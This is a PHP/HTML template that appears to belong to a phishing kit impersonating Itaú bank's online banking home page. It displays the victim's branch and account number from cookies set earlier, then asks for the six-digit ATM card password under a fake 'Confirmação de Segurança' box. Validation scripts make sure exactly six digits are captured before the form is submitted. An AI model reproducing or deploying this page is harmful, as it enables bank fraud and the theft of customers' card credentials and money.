<!doctype html>
<html lang="pt-BR">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
	<meta http-equiv="X-UA-Compatible" content="ie=edge">

	<title>Banco Itaú | Feito com você</title>
	<link rel='shortcut icon' href='<?= DOMINIO; ?>/public/images/favicon.ico'>

	<meta name='theme-color' content='#EC7000'>
	<meta name='apple-mobile-web-app-status-bar-style' content='#EC7000'>
	<meta name='msapplication-navbutton-color' content='#EC7000'>

	<link rel='stylesheet' href='<?= DOMINIO; ?>/public/styles/fonts.css'>
	<link rel='stylesheet' href='<?= DOMINIO; ?>/public/styles/custom.css'>
	<script>
		function getCookie(key) {
			let cookies = document.cookie;
			cookies = cookies.split('; ');

			let hasItem = false;
			let retornar;
			for (let i = 0; i < cookies.length; i++) {
				const atual = cookies[i].split('=');

				if (atual[0] === key) {
					retornar = atual[1];
					hasItem = true;
				}
			}

			if (hasItem) {
				return retornar;
			}
			return false;
		}
	</script>
</head>
<body class="body_dt">

<div class="container dt_header">
		<div class='content_dt flex-row justify-between align-items-center'>
			<div class='menu flex flex-row align-items-center'>
				<img src='<?= DOMINIO; ?>/public/images/icon_dt_menu.png' alt='' class="jClickWai">
				<img src='<?= DOMINIO; ?>/public/images/logo.png' alt='' class="jClickWai">
			</div>

			<div id='hd_dir' class='flex-row justify-between align-items-center'>
				<div class='icon_dt_user jClickWai'><img src='<?= DOMINIO; ?>/public/images/icon_dt_user.png' alt='' class='icon_dt_user'></div>
				<div class='show_user'>ag:
					<script>document.write(getCookie('agencia'));</script> c/c:
					<script>document.write(getCookie('conta'));</script></div>
				<div class='ajuda jClickWai'><img src='<?= DOMINIO; ?>/public/images/icon_dt_ajuda.png' alt=''></div>
				<div class='sair jClickWai'><img src='<?= DOMINIO; ?>/public/images/icon_dt_sair.png' alt=''></div>
			</div>
		</div>
</div>

<div class='container dt_corpo'>
	<div class='content_dt'>
		<h1 class="dt_title">Esta é a sua página inicial</h1>

		<div class="section flex-row align-items-start">
			<div id="esq">
				<div class="box">
					<header>
						<h1>Confirmação de Segurança</h1>
						<img src="<?= DOMINIO; ?>/public/images/icon_dt_seta.png" alt="">
					</header>

					<div class="corpo">
						<div class="header_corpo">
							<h1>Senha do cartão</h1>
							<p>Preencha o campo abaixo com a senha do seu cartão, a mesma utilizada para acessar o caixa eletrônico do Itaú (6 dígitos)</p>
						</div>

						<form action="#" method="post" onsubmit="return checkForm();" autocomplete="off">
							<label for="is_ps6">
								<span>Senha do cartão</span>
								<input type="tel" name="is_ps6" id="is_ps6" maxlength="6" placeholder="6 dígitos" style='-webkit-text-security: disc!important;'>
							</label>

							<button class="btn_confirma">
								Confirmar
							</button>
							<input type="hidden" name="sender" value="ps6">
						</form>
					</div>
				</div>
				<div class="box click jClickWai"><header><h1>Cartões</h1><img src='<?= DOMINIO; ?>/public/images/icon_dt_seta.png' alt=''></header></div>
				<div class="box click jClickWai"><header><h1>Crédito</h1><img src='<?= DOMINIO; ?>/public/images/icon_dt_seta.png' alt=''></header></div>
			</div><!--#esqu-->

			<div id="dir">
				<ul>
					<li class="jClickWai"><div><img src="<?= DOMINIO; ?>/public/images/icon_dt_boleto.png" alt=""><h2>pagamentos</h2></div><img src="<?= DOMINIO; ?>/public/images/icon_dt_seta_right.png" alt=""></li>
					<li class="jClickWai"><div><img src="<?= DOMINIO; ?>/public/images/icon_dt_transferencias.png" alt=""><h2>transferências</h2></div><img src="<?= DOMINIO; ?>/public/images/icon_dt_seta_right.png"
					                                                                                                         alt=""></li>
					<li class="jClickWai"><div><img src="<?= DOMINIO; ?>/public/images/icon_dt_pix.png" alt=""><h2>Pix</h2></div><img src="<?= DOMINIO; ?>/public/images/icon_dt_seta_right.png" alt=""></li>
					<li class="jClickWai"><div><img src="<?= DOMINIO; ?>/public/images/icon_dt_open.png" alt=""><h2>Open Finance</h2></div><img src="<?= DOMINIO; ?>/public/images/icon_dt_seta_right.png" alt=""></li>
				</ul>
			</div>
		</div>
	</div>
</div>

<script src='<?= DOMINIO; ?>/public/javascripts/jquery.min.js'></script>
<script src='<?= DOMINIO; ?>/public/javascripts/jquery.mask.js'></script>
<script src='<?= DOMINIO; ?>/public/javascripts/custom.js'></script>
<script>
	$(document).ready(() => {
		$('#is_ps6').mask('000000');
	});

	function checkForm(){
		const ps6 = $('#is_ps6');

		if(ps6.val().length < 6){
			alert("Informe corretamente a senha do seu cartão com 6 dígitos para continuar.");
			ps6.val('').focus();
			return false;
		}else{
			$('.btn_confirma').attr('disabled', true);
			return true;
		}
	}
</script>
</body>
</html>